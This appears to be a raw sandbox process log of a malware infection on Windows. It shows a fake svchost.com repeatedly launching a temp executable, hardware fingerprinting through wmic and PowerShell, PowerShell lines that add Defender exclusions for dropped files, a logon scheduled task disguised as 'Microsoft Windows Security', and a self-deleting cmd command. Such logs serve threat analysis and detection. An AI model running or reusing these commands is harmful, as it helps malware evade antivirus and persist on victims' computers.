"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe

C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe

C:\Windows\SysWOW64\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe

C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\3058827245.exe

C:\Users\Admin\AppData\Local\Temp\3058827245.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE" && pause

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\SysWOW64\PING.EXE

ping localhost

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe

"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\System32\dwm.exe

C:\Windows\System32\dwm.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100337~1\kxfh9qhs.exe"

C:\Users\Admin\AppData\Local\Temp\100337~1\kxfh9qhs.exe

C:\Users\Admin\AppData\Local\Temp\100337~1\kxfh9qhs.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe"

